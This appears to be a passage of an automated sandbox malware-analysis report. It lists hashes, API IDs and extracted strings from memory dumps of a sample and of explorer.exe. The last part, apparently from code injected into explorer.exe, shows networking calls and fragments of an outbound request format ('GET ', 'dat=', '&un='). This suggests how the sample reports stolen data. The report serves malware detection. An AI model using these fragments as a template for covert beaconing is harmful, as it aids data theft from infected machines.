                                          • Instruction ID: d363ac5bd129ee74ad3c6d9d7145a9730a4ac5629995cdfbbc692ca08802b49b
                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction Fuzzy Hash: 67F01C725046049FE3209F07D944BA2B7A8EB457A4F558025E609DB561D37DEC40EFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction ID: ca8d04e58e8d71c82da19c647c14648d2bbac2fdf2bba63d7a10b876b47ef2ad
                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction Fuzzy Hash: 47F0E53B6043649BDB15CF19E040A957BA5EB45360F144096F8468B342DB39FD81EB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction ID: 112660ee3717b77009c25cf586bfa8ff9ecc644a893b43830a66d3c6ea6e3183
                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction Fuzzy Hash: AAE02233284146ABC3601E148800B2A7AA59BC07B2F110028EB088B140DB78ECC4F398
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e86c979b888fbbf02da9382a88786c7e717a111346a098584462ea859b41880b
                                          • Instruction ID: 659307e5b731679705fe421d3c98c410f6a23af3db77bb735db3df80ffe6bf46
                                          • Opcode Fuzzy Hash: e86c979b888fbbf02da9382a88786c7e717a111346a098584462ea859b41880b
                                          • Instruction Fuzzy Hash: D990023124140812E20471588808686000587D0341F55C033A6064655F9A6989927132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26175fecab513009fbf9b8f49ecb5ae36f11fa5390ed3988a3bbe6d7e60cb412
                                          • Instruction ID: 8f13783a8da8957b616f71256e78baf83bebe19c506247402866dfe96b8e770b
                                          • Opcode Fuzzy Hash: 26175fecab513009fbf9b8f49ecb5ae36f11fa5390ed3988a3bbe6d7e60cb412
                                          • Instruction Fuzzy Hash: 4290023124140413E2007158950C707000587D0341F55D433A0464558EDA5A89527122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b2e83c2d8ebb1ac23e5678878164086abcbc79ccfdeeae63635de67a5e55deb
                                          • Instruction ID: 21d5b921469f6c30b1cc3424349405e49d3f07397b6db47623ef9e60888d36d4
                                          • Opcode Fuzzy Hash: 7b2e83c2d8ebb1ac23e5678878164086abcbc79ccfdeeae63635de67a5e55deb
                                          • Instruction Fuzzy Hash: 7490022164540412E2407158941C706001587D0341F55D033A0064554ECA5D8B5676A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96b2bfc1b8e09ef8389bb659f5023ba8967bc647d508cbef860c6c0830830377
                                          • Instruction ID: fcf9b212da93393d667475b80f528070d9213ebd8fab64c22620b6405d0dfcfd
                                          • Opcode Fuzzy Hash: 96b2bfc1b8e09ef8389bb659f5023ba8967bc647d508cbef860c6c0830830377
                                          • Instruction Fuzzy Hash: DB90023124140852E20071588408B46000587E0341F55C037A0164654E8A19C9527522
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92d31b1d2c831f17d362be54496a33b5362b20ca0c648b7a601ce2fcfc056af4
                                          • Instruction ID: a2b350cd44715d2058a9f05543f675bb60d4c371067b0c45fb2010f038c5f367
                                          • Opcode Fuzzy Hash: 92d31b1d2c831f17d362be54496a33b5362b20ca0c648b7a601ce2fcfc056af4
                                          • Instruction Fuzzy Hash: 5B90023128140412E24171588408606000997D0381F95C033A0464554F8A598B57BA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 331de63ae2461213d10a5560acd123dcc4d302753ffac44576065f242841abed
                                          • Instruction ID: 01fd423267e34f5a297ae58378da0b5f909032c7afb816449ed443f6386d795f
                                          • Opcode Fuzzy Hash: 331de63ae2461213d10a5560acd123dcc4d302753ffac44576065f242841abed
                                          • Instruction Fuzzy Hash: A090022124544452E2007558940CA06000587D0345F55D033A10A4595ECA398952B132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47c339e0de10d0e60e2de0b6783a5515a1ee9f7ef6587aed509f12e7bf7733e4
                                          • Instruction ID: 1bf5229f39239456312e406cf28b9408c5ddfedc7807429f45505d911170b298
                                          • Opcode Fuzzy Hash: 47c339e0de10d0e60e2de0b6783a5515a1ee9f7ef6587aed509f12e7bf7733e4
                                          • Instruction Fuzzy Hash: 4590026124180413E24075588808607000587D0342F55C033A20A4555F8E2D8D527136
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cb8a7f8e6d753cc264cd7d695b1209e42bb7a630e540f9cc3bc3bc2bf96a96d
                                          • Instruction ID: c3c81de86e0cc385ab29a41bde3757cde9e5b5e44f53338a7bf600c8828452ed
                                          • Opcode Fuzzy Hash: 5cb8a7f8e6d753cc264cd7d695b1209e42bb7a630e540f9cc3bc3bc2bf96a96d
                                          • Instruction Fuzzy Hash: 6890022134140412E202715884186060009C7D1385F95C033E1464555E8A298A53B133
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5eb1ea770815a882f2d72d26104e2f9a43f1f030300adc951579468c3397955e
                                          • Instruction ID: 30d9d4efbeb0acf14a54389c7034f500f2e5f3bbbcd265b0ec280498a04e6a2d
                                          • Opcode Fuzzy Hash: 5eb1ea770815a882f2d72d26104e2f9a43f1f030300adc951579468c3397955e
                                          • Instruction Fuzzy Hash: 0990023124180412E2007158880C747000587D0342F55C033A51A4555F8A69C9927532
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97e88e3f0c5c48220637b522f387da862b1774fc4bb25b197785750054d42950
                                          • Instruction ID: a08df123ae3059e0e18790c038575a50126d3c9e2a3dfc3d8c158bb71f4d9488
                                          • Opcode Fuzzy Hash: 97e88e3f0c5c48220637b522f387da862b1774fc4bb25b197785750054d42950
                                          • Instruction Fuzzy Hash: FC90026125140052E20471588408706004587E1341F55C033A2194554DC92D8D626126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b316bca1a2a63a46db25520466c537a49faf8dfac76e9d669db17f604e1c32f
                                          • Instruction ID: 9fcc10ba89276e25c088f282d07b44a6a1b3cff10108c166bc4caf59bb9745ee
                                          • Opcode Fuzzy Hash: 0b316bca1a2a63a46db25520466c537a49faf8dfac76e9d669db17f604e1c32f
                                          • Instruction Fuzzy Hash: 7D90022128140812E2407158C4187070006C7D0741F55C033A0064554E8A1A8A6676B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb9fc560d35a6b2e8cf99ec1cc33b392a20939164b104963b68e280fb1ad9c60
                                          • Instruction ID: d2aed7ce460c90b247cf0f8c407b3f53c40a26b297c4722126d2794dc6c319b7
                                          • Opcode Fuzzy Hash: bb9fc560d35a6b2e8cf99ec1cc33b392a20939164b104963b68e280fb1ad9c60
                                          • Instruction Fuzzy Hash: 3390022124184452E24072588808B0F410587E1342F95C03BA4196554DCD1989566722
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8a4512265b8825241af12efdcadc6b47946802379c636cc0b1b217738924554
                                          • Instruction ID: d5086a026b55aae2355a1e5851894e7c8f7559757dd27543dcb075c04a85b7da
                                          • Opcode Fuzzy Hash: f8a4512265b8825241af12efdcadc6b47946802379c636cc0b1b217738924554
                                          • Instruction Fuzzy Hash: 9B90023164550412E20071588518706100587D0341F65C433A0464568E8B998A5275A3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0de20a1a7059b03f5fc3f7eb9b88457fcd1aae82040c42d60a145837d15e87e
                                          • Instruction ID: 50431f4d50565d1b7234b2f3b707f5317573c9f1af4f2b553ae4f57c7f6904c4
                                          • Opcode Fuzzy Hash: f0de20a1a7059b03f5fc3f7eb9b88457fcd1aae82040c42d60a145837d15e87e
                                          • Instruction Fuzzy Hash: C790022128545112E250715C84086164005A7E0341F55C033A0854594E895989567222
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f93fa5fb0d1999aa968135645f5e3accb5a6eef6118b213315ac4f8fb3f20f9
                                          • Instruction ID: e4027bafcaace1454af109b49397dd329fd547fa816fa18627a96bb1fb40d3c2
                                          • Opcode Fuzzy Hash: 0f93fa5fb0d1999aa968135645f5e3accb5a6eef6118b213315ac4f8fb3f20f9
                                          • Instruction Fuzzy Hash: DC90023524140412E61071589808646004687D0341F55D433A0464558E8A5889A2B122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7302f4fb52d8a1ad4b0e6c08d521830219a6e7299bb3d7741f9c4c47715aa24e
                                          • Instruction ID: 3fdbc643f0eedef3e7faab81d2210ef65b0487ae50a75f387746191e971819be
                                          • Opcode Fuzzy Hash: 7302f4fb52d8a1ad4b0e6c08d521830219a6e7299bb3d7741f9c4c47715aa24e
                                          • Instruction Fuzzy Hash: 7490023124240152A64072589808A4E410587E1342B95D437A0055554DCD1889626222
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: f1714d48c5e40295d540e066429b6ff65e6101ec3c81c223ddb811f5147d110e
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Execute=1, xrefs: 00F94713
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00F94655
                                          • ExecuteOptions, xrefs: 00F946A0
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00F94725
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 00F94787
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00F94742
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00F946FC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 00F9031E
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F902E7
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F902BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 00F97BAC
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00F97B7F
                                          • RTL: Resource at %p, xrefs: 00F97B8E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F9728C
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 00F972C1
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00F97294
                                          • RTL: Resource at %p, xrefs: 00F972A3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: 5b2fde1c5899349603a3b21bfeeae6431efe8bf44928f866f3b252b1619b4723
                                          • Instruction ID: c918b7cc3f6dffc5a0eb2f5c05d6a01411f5de8e6759e22dc7e2321b3c02ba5e
                                          • Opcode Fuzzy Hash: 5b2fde1c5899349603a3b21bfeeae6431efe8bf44928f866f3b252b1619b4723
                                          • Instruction Fuzzy Hash: E3412532B14302ABDB20DF65CC42B66B7A1FF84721F100619FD55DB281DB31E806ABD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 52c9acbb555a1a067e3fc4e4141279d84b7192aa0c24d8c0344a53f0676a620b
                                          • Instruction ID: 7bb405d73f556021b6cb83042be42a7ad70e4df0d78f1cc1836ecd8d9fc7b0b7
                                          • Opcode Fuzzy Hash: 52c9acbb555a1a067e3fc4e4141279d84b7192aa0c24d8c0344a53f0676a620b
                                          • Instruction Fuzzy Hash: D031B472A002189FCB60DF28CC40BEEB7B9EF14710F484556E849E3240EB35EE44AFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: b510502c755a9a215e26db1f1916f80f2b2ec516b885d338777591198058776a
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 9391C671E083069BDF24EF69C881ABEB7B1EF54734F24461AE855E72C0DB348D41A790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 3b89fcc3d66ea7b1960c5266f7b3df8ea3150e19672ed8d8b839297fe21c2ea2
                                          • Instruction ID: ee34a520599a1ab30bf4bc6012327a00c0c2c8f0dae9b7a44fd4e5d4a0b87136
                                          • Opcode Fuzzy Hash: 3b89fcc3d66ea7b1960c5266f7b3df8ea3150e19672ed8d8b839297fe21c2ea2
                                          • Instruction Fuzzy Hash: D3811B72D002799BDB31DB54CC45BEEB7B4AF08750F0441EAA919B7280E7759E84DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.7%
                                          Total number of Nodes:444
                                          Total number of Limit Nodes:15

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: getaddrinforecvsetsockopt
                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                          • API String ID: 1564272048-1117930895
                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction ID: 47124c07fb39ae0bca409dc8aafad658339579587a9052d9082cdecd53f3961f
                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction Fuzzy Hash: 0F529370614A088FDB29EF68D4987E9B7E1FB54310F50492ED4AFCB166EF30A945CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: `
                                          • API String ID: 823142352-2679148245
                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction ID: b01937ea6005fa5ec67cc2ca5e0c1cc6475ab3ed2c565e625c1bca543924b0c9
                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction Fuzzy Hash: 4C2232B0A18E099FCB69DF28C4996ADF7E1FB98301F40462ED59ED7260DB30D851CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 443 e74ee12-e74ee6e call e74d942 NtProtectVirtualMemory 446 e74ee70-e74ee7c 443->446 447 e74ee7d-e74ee8f 443->447
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 0E74EE67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction ID: e2e033de5126155b20fa29bb3def9afb25baae07cc8d538098b6782a633700d8
                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction Fuzzy Hash: 77017134668B484F9B88EF6CD48522AB7E4FBDE315F000B3EE99AC7254EB74D9414742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

